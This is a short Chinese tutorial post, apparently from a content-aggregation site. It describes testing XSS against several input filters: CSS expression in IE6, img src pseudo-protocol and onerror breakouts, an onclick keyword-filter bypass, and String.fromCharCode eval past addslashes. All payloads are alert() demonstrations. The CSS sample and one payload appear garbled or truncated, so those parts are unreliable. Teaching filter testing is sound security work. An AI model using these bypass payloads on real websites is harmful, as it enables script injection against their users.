xss的小测试是怎样进行的

• 无安全方面的限制，直接使用

• 限制条件：只能使用CSS，不允许使用html标签

我们知道利用expression可以用来构造XSS，但是只能在IE下面测试，所以下面的测试请在IE6中执行。

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}

• 限制条件：对HTML进行了转义，Image标签可用。

测试输入的字符会被插入到src地址中，那么可以使用伪协议来绕过。

直接输入

alert( /xss/);

或者你也可以使用事件来绕过，注意闭合语句即可，如下：

1" onerror=alert(/xss/); var a="1

• 限制条件：使用了关键字过滤。

我测试了一下，大部分都过滤了，有部分未过滤，经测试script/onerror过滤了，但是onclick未过滤，使用onclick事件绕过

<img src=# onclick=alert(/xss/);>

• 限制条件：使用addslashes对特征字符进行了转义

也就是说我们的XSS语句中不能出现单引号，双引号等等特征字符。

直接使用

<script>alert(/xss/);</script>

即可绕过

或者使用String.fromCharCode方法，如下：

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>

以上就是xss的小测试是怎样进行的的详细内容，更多请关注www.sxiaw.com其它相关文章！